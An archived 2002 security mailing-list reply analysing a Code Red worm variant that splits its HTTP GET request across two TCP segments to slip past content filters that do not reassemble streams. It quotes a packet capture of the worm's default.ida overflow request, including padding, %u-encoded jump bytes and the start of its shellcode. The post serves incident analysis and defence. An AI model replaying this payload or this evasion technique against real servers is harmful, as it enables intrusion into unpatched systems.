Re: new codered worm penetrates content-filtering

From: Michael H. Warfield (mhwat_private)
Date: Thu Jan 10 2002 - 12:07:38 PST

  • Next message: Nick FitzGerald: "Re: new codered worm penetrates content-filtering"

    On Thu, Jan 10, 2002 at 01:18:36PM -0500, Chris Russel wrote:
    > For those who asked, here's a sample of the GET request packets.  With
    > normal codered (and any other web traffic) the GET would be in the same
    > packet as the URL since there is no reason to fragment.
    > Ironically, the Don't Fragment bit is set...
    
    	And they are not fragmented.  They're being sent as two
    separate IP datagrams, neither of which are fragmented [or you would
    have a "(frag id:size@offset+)" field in your dump].
    
    	Cute trick...  Means that this new varient is sending the
    "GET " on the wire first with a "PUSH" (telling the underlying stack
    to push out the data) and then sending the request in a separate call.
    
    	Not a difficult trick at all.  Slides right past anything that
    isn't doing full stream reassembly for content.  Anything that is only
    doing IP datagram fragment reassembly or no reassembly will not see it.
    
    > 08:05:00.285196 a.b.c.d.3237 > w.x.y.z.80: P 1:5(4) ack 1 win 16384 (DF)
    > payload:
    > 0030                    47 45  54 20 00 00                     GE T ..
    > 
    > 08:05:00.289638 a.b.c.d.3237 > w.x.y.z.80: P 5:513(508) ack 1 win 16384 (DF)
    > payload:
    > 0030                    2f 64  65 66 61 75 6c 74 2e 69         /d efault.i
    > 0040  64 61 3f 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   da?NNNNN NNNNNNNN
    > 0050  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0060  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0070  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0080  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0090  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00a0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00b0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00c0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00d0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00e0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 00f0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0100  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0110  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
    > 0120  4e 4e 4e 25 75 39 30 39  30 25 75 36 38 35 38 25   NNN%u909 0%u6858%
    > 0130  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
    > 0140  30 25 75 36 38 35 38 25  75 63 62 64 33 25 75 37   0%u6858% ucbd3%u7
    > 0150  38 30 31 25 75 39 30 39  30 25 75 36 38 35 38 25   801%u909 0%u6858%
    > 0160  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
    > 0170  30 25 75 39 30 39 30 25  75 38 31 39 30 25 75 30   0%u9090% u8190%u0
    > 0180  30 63 33 25 75 30 30 30  33 25 75 38 62 30 30 25   0c3%u000 3%u8b00%
    > 0190  75 35 33 31 62 25 75 35  33 66 66 25 75 30 30 37   u531b%u5 3ff%u007
    > 01a0  38 25 75 30 30 30 30 25  75 30 30 3d 61 20 20 48   8%u0000% u00=a  H
    > 01b0  54 54 50 2f 31 2e 30 0d  0a 43 6f 6e 74 65 6e 74   TTP/1.0. .Content
    > 01c0  2d 74 79 70 65 3a 20 74  65 78 74 2f 78 6d 6c 0a   -type: t ext/xml.
    > 01d0  48 4f 53 54 3a 77 77 77  2e 77 6f 72 6d 2e 63 6f   HOST:www .worm.co
    > 01e0  6d 0a 20 41 63 63 65 70  74 3a 20 2a 2f 2a 0a 43   m. Accep t: */*.C
    > 01f0  6f 6e 74 65 6e 74 2d 6c  65 6e 67 74 68 3a 20 33   ontent-l ength: 3
    > 0200  35 36 39 20 0d 0a 0d 0a  55 8b ec 81 ec 18 02 00   569 .... U.......
    > 0210  00 53 56 57 8d bd e8 fd  ff ff b9 86 00 00 00 b8   .SVW.... ........
    > 0220  cc cc cc cc f3 ab c7 85  70 fe ff ff 00 00 00 00   ........ p.......
    > 0230  e9 0a                                              ..
    > 
    > -- 
    > Chris Russel     | CNS Information Security
    > russelat_private  | York University, Toronto, Canada
    
    	Mike
    -- 
     Michael H. Warfield    |  (770) 985-6132   |  mhwat_private
      /\/\|=mhw=|\/\/       |  (678) 463-0932   |  http://www.wittsend.com/mhw/
      NIC whois:  MHW9      |  An optimist believes we live in the best of all
     PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 16:36:29 PST